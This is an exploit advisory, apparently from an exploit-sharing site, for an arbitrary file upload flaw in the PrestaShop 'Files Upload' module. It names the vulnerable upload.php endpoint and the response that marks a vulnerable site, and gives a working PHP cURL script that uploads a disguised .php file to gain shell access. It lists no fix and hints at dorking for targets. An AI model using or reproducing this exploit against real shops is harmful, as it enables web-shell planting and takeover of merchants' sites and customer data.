Module Files Upload Arbitrary File Upload - PrestaShop

#- Title: Module Files Upload Arbitrary File Upload - PrestaShop

#- Author: UyulCrack

#- Published : 30/06/2016

#- Developer : Prestashop

#- Link Download : addons.prestashop .com/fr/4270-files-upload.html

#- Price : 79,99 €
#- Google Dork: Use Your Brain

#- Fixed in Version : -

#- Tested on : windows

=======================================================

-- Proof Of Concept --

Description : 

Simplify sending large files to your customers! This module allows your customers to send you one or more files in a simple and fast way. For example, a client wants to send EPS files of several gigabytes.
With this module you can recover the files just in the backoffice of your PrestaShop,

• Multilingual
• Multi Upload
• Drag and Drop
• Filter on file extensions
•  Limit files size
• Download customers files on the backoffice
• Send a mail to the customer at the end of the upload
• Send an email to the admin of the store
• Only connected customers can upload files
• Multi-Hook Module: right column, top left page, product page.

Vulnerability : 
site /modules/filesupload/upload.php

When Vuln : 

{"jsonrpc" : "2.0", "result" : null, "id" : "id"}

CSRF

<?php

$url = "http://www.site"; // put URL Here
$post = array
(
       "file" => "@3xploi7.jpg",
       "name" => "3xploi7.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;

?>

If Succesfully   > 

Shell Acces ? Click Here 

Greetings by UyulCrack

Thanks for TKJ Cyber Art - Indonesian Code Party - ZeynnymouZ

Tweet